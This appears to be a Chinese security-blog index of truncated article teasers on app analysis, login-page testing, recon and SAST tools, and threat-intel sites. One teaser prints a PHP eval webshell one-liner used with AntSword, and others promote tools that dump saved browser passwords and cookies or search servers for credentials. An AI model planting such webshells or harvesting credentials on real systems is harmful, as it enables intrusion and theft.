2024年10月22日,我在某果应用商店中偶然发现了一款社交软件（以下称某E）,浏览其评论时,一些异常之处引起了我的警觉,于是决定深入调查一番我首先打开抓包软件,再启动某E,此时,软件显示正在下载...

本文已获得公众号'重生之成为赛博女保安'授权发布小蹭热度，本来不想写的，属实是在颤音上一天刷到三四十次刷腻了+小猿这边确实有API泄露，哈哈大一也是一最近互联网上最火的游戏可能就是上小猿...

因为实在太闲所以决定写一点面向新手的文章，多数为我个人的理解，有什么不足的话各位师傅可以指正。1.登录登录处做的好的话一般只有弱口令（例如若依），但是当我们遇到二开系统或是自研系统，...

01 工具介绍集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼为一体的gui图形界面化工具02 工具下载Search_Viewer下载：Search_Viewer下载03 实测效果：  注意：在使用之前需要先在c...

01 工具介绍HackBrowserData是一个命令行工具，用于从浏览器解密和导出浏览器数据（密码、历史记录、cookie、书签、信用卡、下载记录、本地存储和扩展）。它支持市场上最流行的浏览器，并在 Win...

01 工具介绍searchall可以快速搜索服务器中的有关username，passsword,账号，口令的敏感信息02 下载链接searchall工具下载：searchall工具下载03 实测效果实测有效

一、产品定位“铲子”是一款简单易用的SAST（静态应用程序安全测试）工具，旨在为安全工程师提供一款简单、好用、价格厚道的JAVA代码安全扫描产品。二、功能介绍支持语言: java（spring、dubbo...

<?php @eval($_POST['knight']);?>我将此木马放到某服务器，antsword打开终端后发现输入什么命令都显示ret=127 这说明disable_functions生效查看PHPINFO：<?php phpinfo();?>发现...

https://www.h-acker.cn/#/

威胁情报平台微步https://x.threatbook.com/安恒https://ti.dbappsecurity.com.cn/360https://ti.360.cn/https://ti.360.net/奇安信https://ti.qianxin.com/启明星辰https://ti.venuseye.com.cn...